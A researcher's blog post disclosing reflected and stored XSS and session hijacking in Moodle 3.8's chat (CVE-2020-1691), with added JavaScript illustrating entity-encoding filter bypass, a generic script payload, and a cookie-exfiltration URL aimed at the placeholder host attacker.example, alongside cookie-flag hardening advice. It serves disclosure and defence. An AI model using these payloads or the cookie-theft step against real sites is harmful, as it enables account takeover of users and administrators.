Stored XSS + Session Hijacking

Cid da Costa, stolabs
Jan 24, 2020

Hi, I'm Cid da Costa. As an information security researcher, I carried out a security assessment to find issues in a very popular learning platform, Moodle, in version 3.8.

In its own words (reference 1), Moodle is a learning platform designed to provide educators, administrators and learners with a single robust, secure and integrated system to create personalized learning environments. You can download the software onto your own web server or ask one of Moodle's Partners to assist you.


Moodle is built by the Moodle project which is led and coordinated by Moodle HQ, which is financially supported by a network of over 80 Moodle Partner service companies worldwide.

The vulnerabilities found were:

• Reflected XSS on chat
• Stored XSS on chat
• Session Hijacking

Cross-Site Scripting (XSS) is a class of injection attack in which script, usually malicious, is delivered to a victim's browser through an application that fails to validate its inputs or to encode its outputs. These flaws are easy to exploit when the developers of an application do not treat user-controlled input with the right care and build no mechanism to validate it, or to encode it for the context in which it is rendered.
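The difference between filtering input and encoding output is the whole story of this post, so here is an added example (my own illustration, not Moodle's code and not the author's payload). `naiveSanitize` and `decodeEntities` are hypothetical stand-ins for a pipeline that strips tags on the way in and decodes HTML entities on the way out; the payload is a generic one.

```javascript
// Added example (not Moodle's code): a blacklist-style input filter plus a
// renderer that decodes HTML entities lets an entity-encoded payload through,
// while contextual output encoding keeps the same payload inert.
// naiveSanitize and decodeEntities are hypothetical stand-ins for such a pipeline.

// Contextual output encoding for text placed inside an HTML element or attribute.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Hypothetical input-side filter: removes the <script> tags it can see.
function naiveSanitize(s) {
  return s.replace(/<\s*\/?\s*script[^>]*>/gi, "");
}

// Encode every character as a decimal HTML entity (what a decoder tool emits).
function entityEncode(s) {
  return Array.from(s, ch => "&#" + ch.codePointAt(0) + ";").join("");
}

// Hypothetical renderer that decodes entities once before writing to the DOM.
function decodeEntities(s) {
  return s
    .replace(/&#(\d+);/g, (_, n) => String.fromCodePoint(Number(n)))
    .replace(/&lt;/g, "<")
    .replace(/&gt;/g, ">")
    .replace(/&quot;/g, '"')
    .replace(/&amp;/g, "&");
}

// Vulnerable pipeline: filter on input, decode on output.
function renderFiltered(message) {
  return decodeEntities(naiveSanitize(message));
}

// Hardened pipeline: store the raw text, encode at the point of output.
function renderEncoded(message) {
  return escapeHtml(message);
}

// True when the markup still contains an active <script> start tag.
function hasScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

const PAYLOAD = "<script>alert(document.domain)</script>";

// Plain payload through the filter: caught.
// Entity-encoded payload through the filter: survives and decodes back to a live tag.
// Same encoded payload with output encoding: inert.
console.log(
  hasScriptTag(renderFiltered(PAYLOAD)),
  hasScriptTag(renderFiltered(entityEncode(PAYLOAD))),
  hasScriptTag(renderEncoded(entityEncode(PAYLOAD)))
);
```

The point is that the filter only sees what the attacker chooses to show it; the renderer sees the decoded form. Encoding at output, for the exact context (element body, attribute, URL, script), does not depend on guessing which representation the attacker will use.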

After this brief introduction, I will test how the application handles input passed through a text field in a chat session between an administrator and a student, then steal the session cookie and hijack the session.

At the beginning of the assessment, I noticed that when I passed a script without any kind of encoding, the application applied some input sanitization, but a reflected XSS still executed on the site. Searching for an encoding that would let the script remain stored in a chat session, I used HTML encoding from Burp Suite, in a tab called "Decoder Improved", an extension downloaded from the BApp Store. With this encoding I obtained a payload that produced an XSS which ran and was stored in the chat session. I then used this stored XSS to run a script that captures the session cookie of the user logged into the chat, and performed a session hijacking. Besides that, I sent the captured cookies to a remote server, where they were stored for later use.

A session hijacking attack consists of exploiting the web session control mechanism, which is normally managed through a session token.
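What the stored script can actually read, and what stops it, comes down to the attributes on the session cookie. The following is an added example of mine, not code from the post or from Moodle: it parses a Set-Cookie header, models what `document.cookie` exposes to page script, builds the exfiltration URL a payload like the one described above would request, and reports which protective flags are missing. The two header lines are constructed, and `attacker.example` is a placeholder collector host.

```javascript
// Added example (not Moodle's code): what a stored-XSS payload can read from
// document.cookie, and how the HttpOnly flag removes the session-hijacking step.
// The Set-Cookie lines below are constructed, not captured from a real server.

// Parse one Set-Cookie header into { name, value, attrs }.
function parseSetCookie(header) {
  const [pair, ...rest] = header.split(";").map(p => p.trim());
  const eq = pair.indexOf("=");
  const attrs = {};
  for (const a of rest) {
    const i = a.indexOf("=");
    const key = (i === -1 ? a : a.slice(0, i)).toLowerCase();
    attrs[key] = i === -1 ? true : a.slice(i + 1);
  }
  return { name: pair.slice(0, eq), value: pair.slice(eq + 1), attrs };
}

// Model of document.cookie: only cookies without HttpOnly are visible to script.
function documentCookieView(cookies) {
  return cookies
    .filter(c => !c.attrs.httponly)
    .map(c => `${c.name}=${c.value}`)
    .join("; ");
}

// The request a cookie-stealing payload makes (collector host is a placeholder).
function exfilUrl(cookieString, collector = "https://attacker.example/c") {
  return collector + "?c=" + encodeURIComponent(cookieString);
}

// Flags a session cookie should carry; returns the ones that are absent.
function missingSessionFlags(cookie) {
  return ["httponly", "secure", "samesite"].filter(f => !(f in cookie.attrs));
}

// Constructed headers: a weak session cookie and a hardened one.
const WEAK = "MoodleSession=abc123def456; path=/";
const HARDENED = "MoodleSession=abc123def456; path=/; HttpOnly; Secure; SameSite=Lax";

// What the payload sees and sends for a given Set-Cookie header.
function demo(header) {
  const cookie = parseSetCookie(header);
  const visible = documentCookieView([cookie]);
  return {
    visible,
    url: visible ? exfilUrl(visible) : null,
    missing: missingSessionFlags(cookie),
  };
}

console.log(demo(WEAK));
console.log(demo(HARDENED));
```

With the weak header the payload gets the whole session token and the attacker replays it in a Cookie header to become the administrator; with HttpOnly set the same XSS still runs, but `document.cookie` is empty, so the hijack has to fall back on riding the victim's session from inside the page. Moodle exposes these attributes through `$CFG->cookiehttponly` and `$CFG->cookiesecure` in config.php, which is worth checking on any deployment; note that HttpOnly limits the impact of an XSS but does not fix it.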

So let me demonstrate in the video below how I carried out this attack: exploiting a simple reflected XSS, turning it into a stored one, and then escalating the impact of the flaw by manipulating session cookies to grant one user's session rights to another.

Thanks for reading and enjoy the video.

Video: Stored XSS attack against Moodle 3.8

I would like to thank my co-workers for the support they have always given me.

Related CVE ID: CVE-2020-1691
https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-1691

References:

1. https://docs.moodle.org/38/en/About_Moodle
2. https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
3. https://www.owasp.org/index.php/Session_hijacking_attack
